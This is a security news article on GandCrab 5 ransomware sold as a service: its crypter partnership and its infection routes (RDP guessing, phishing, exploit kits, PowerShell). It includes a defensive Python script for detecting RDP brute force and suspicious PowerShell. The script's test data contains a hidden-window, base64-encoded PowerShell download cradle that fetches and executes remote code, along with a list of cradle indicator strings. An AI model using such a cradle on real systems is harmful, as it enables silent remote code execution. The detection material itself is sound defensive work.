New GandCrab 5 ransomware strains have recently appeared in attacks run by different criminal groups. The available research indicates that the developers are offering the malware to these groups on underground markets as ransomware-as-a-service (RaaS).
GandCrab 5 Ransomware Used in RaaS Attacks Against Targets Worldwide
Research into the recently released GandCrab 5 ransomware has led experts to believe that the new samples are being distributed under a "ransomware-as-a-service" (RaaS) model. It is a widespread threat that has been used in targeted attacks worldwide and, in a relatively short time, has compromised thousands of networks and computers belonging to individual users, small companies and large businesses alike.
Following the operators' movements, researchers found that they are partnering with a malware crypting service called NTCrypt. A crypter packs and obfuscates the ransomware binary so that security software has a harder time detecting and removing it. According to the research, it adds an extra layer of stealth: the packed payload looks for installed security products by searching for their characteristic strings, and attempts to bypass or entirely remove the engines of any product it finds.
According to the experts, this partnership has widened the distribution of GandCrab 5 and fostered the creation of its many variants. One piece of evidence is that the GandCrab operators publicly announced a competition among crypting services before settling on NTCrypt.
Another reason for the success of the infections is the marketing approach taken by the operators. The use of several exploit kits, combined with large-scale intrusions and targeted campaigns, has driven up demand for the core ransomware samples. Machines are being compromised in several ways:
- Remote Desktop Connection Abuse — The operators log in over RDP using default or weak username and password combinations. In some cases the credential lists appear to have been purchased on underground hacker forums.
- Email Phishing Scams — Fake email messages designed to look as if they were sent by legitimate Internet services and companies.
- Trojans — A sizable share of GandCrab 5 infections appear to have been caused by Trojans that drop the ransomware through an internal payload-delivery script.
- Exploit Kits — One of the main delivery methods is the use of exploit kits such as RIG and Fallout.
- PowerShell Scripts — GandCrab 5 can also be delivered by PowerShell scripts.
- Botnet Attacks — Botnets give the operators an easy way to launch coordinated, large-scale attacks.
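Two of the vectors above, RDP password guessing and PowerShell-based delivery, leave traces a defender can look for in Windows Security events. The following is an added example written for this article, not code from the GandCrab research or from any operator: it runs simple detection logic over a constructed set of event records. The field names, the sample records, the failure threshold and time window, and the indicator strings are all assumptions made for the example; the one fixed fact it relies on is that PowerShell's -EncodedCommand argument is base64 of a UTF-16LE string.

```python
"""Toy detection for RDP password guessing (4625/4624, logon type 10) and
suspicious PowerShell launches (4688) over constructed Windows Security
event records. Added example; field names and thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import base64
import re


def _ts(s):
    return datetime.fromisoformat(s)


# Constructed sample events (not real logs): a guessing burst from
# 198.51.100.7 that ends in a successful RDP logon, one isolated failure
# from another host, and two PowerShell launches, one of them a hidden-window
# encoded download cradle pointing at a reserved, non-resolvable domain.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"time": "2018-10-01T02:00:%02d" % (i * 7), "id": 4625, "logon_type": 10,
     "src": "198.51.100.7", "user": u}
    for i, u in enumerate(["administrator", "admin", "administrator",
                           "user", "administrator", "admin"])
] + [
    {"time": "2018-10-01T02:01:10", "id": 4624, "logon_type": 10,
     "src": "198.51.100.7", "user": "administrator"},
    {"time": "2018-10-01T02:03:00", "id": 4625, "logon_type": 10,
     "src": "203.0.113.9", "user": "bob"},
    {"time": "2018-10-01T02:05:00", "id": 4688, "process": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + _ENCODED},
    {"time": "2018-10-01T03:00:00", "id": 4688, "process": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag sources with >= threshold failed RDP logons inside a sliding
    window, and record whether a successful RDP logon from that source
    followed the burst (a likely compromise rather than just noise)."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        if ev.get("logon_type") != 10:
            continue
        if ev["id"] == 4625:
            failures[ev["src"]].append(_ts(ev["time"]))
        elif ev["id"] == 4624:
            successes[ev["src"]].append(_ts(ev["time"]))
    alerts = {}
    for src, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[src] = {
                    "failures": len(times),
                    "success_after": any(t > times[start] for t in successes[src]),
                }
                break
    return alerts


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Assumed indicator strings for download cradles and hidden windows.
_SUSPICIOUS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
               "frombase64string", "-w hidden", "-windowstyle hidden", "bitsadmin")


def detect_suspicious_powershell(events):
    """Return 4688 PowerShell launches whose raw or decoded command line
    contains one of the indicator strings."""
    hits = []
    for ev in events:
        if ev.get("id") != 4688 or "powershell" not in ev.get("process", "").lower():
            continue
        cmd = ev["cmdline"]
        decoded = decode_encoded_command(cmd)
        text = (cmd + " " + (decoded or "")).lower()
        matched = [s for s in _SUSPICIOUS if s in text]
        if matched:
            hits.append({"time": ev["time"], "decoded": decoded, "indicators": matched})
    return hits


if __name__ == "__main__":
    for src, info in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print("RDP guessing from %s: %d failures, success after burst: %s"
              % (src, info["failures"], info["success_after"]))
    for h in detect_suspicious_powershell(SAMPLE_EVENTS):
        print("Suspicious PowerShell at %s: %s -> %s"
              % (h["time"], h["indicators"], h["decoded"]))
```

On real data the event dictionaries would come from an EVTX parser or a SIEM export, and the threshold and window should be tuned to the environment; the important design point is that a burst of 4625 events followed by a 4624 from the same source is treated differently from failures alone, and that encoded PowerShell is decoded before the indicator strings are checked, since the raw command line shows none of them.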
The ransomware-as-a-service (RaaS) model is an effective way to spread malware, because it enables even inexperienced attackers to run infection campaigns on a global scale.